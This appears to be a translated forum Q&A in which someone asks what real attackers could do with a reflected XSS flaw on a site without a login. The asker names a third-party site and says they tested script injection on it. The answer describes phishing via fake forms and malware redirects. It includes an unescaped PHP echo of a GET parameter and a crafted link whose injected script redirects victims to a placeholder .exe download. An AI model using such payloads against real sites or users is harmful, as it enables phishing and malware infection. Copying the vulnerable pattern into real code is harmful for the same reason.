Question:
I'm not some kind of hacker, but I know some techniques. I'm training security and I got really thoughtful about the issue. Every time I inject a script, it's an alert() , nothing dangerous for the host (for example). I don't have a website, there would be no way to forward cookies. What is the big risk of an XSS failure on a site without DB/login system? I have a real website here ( http://www.verinha.de/commentary_english.htm ) that I found messing around on the internet. Yes, it's a potential mistake, however, as the site doesn't have a login system, and I don't know anything a black hat can do. What would real "hackers/crackers" do?
PS: to try it out, I <script>window.location = "https://www.google.com";</script> . I was forwarded to Google and returned to the page. Nothing happened.
Answer:
There is no right way to explore this. Basically, you need to understand who accesses the site and what is the focus of users and often it is not enough to just use a technique, for example:
Let's assume that the users of the site in question have an account on the XPTO Site. You could create a redirect or an iframe to a false XPTO Site page with a form and copy this data. As the user entered the site alone that has the XSS problem, he will not think he is being cheated. Another example would be to include a redirect to an .exe for the purpose of attacking the user's computer. This is commonly seen with bank or e-wallet pages.
In the example in question the XSS is not persistent , that is, it is not saved within the page, possibly there is no database. In this case the technique has to be adapted, it is common to pass the script through GET when the problem uses some form field.
<?php
$name = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>
This is an example very similar to the mentioned site, the difference is that the information is passed via PHP GET and not via JavaScript Prompt. In this case, it would be enough to send users a link such as
http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>
A variant of this technique was widely used at the time of Orkut , Google already used the login "Com conta Google" by default, but there was an additional parameter called redirect , many sent this url with a redirect to an .exe file or a página falsa de login . I know the problem was not XSS related but I think it's worth mentioning.
On the website http://www.verinha.de there really is an XSS problem, but when analyzing the source code it is possible to see that the result is not stored anywhere, and that it is not possible to inform the value through the url. In general, there is no application in this case, at least not using only this technique.
I hope I have complemented on something.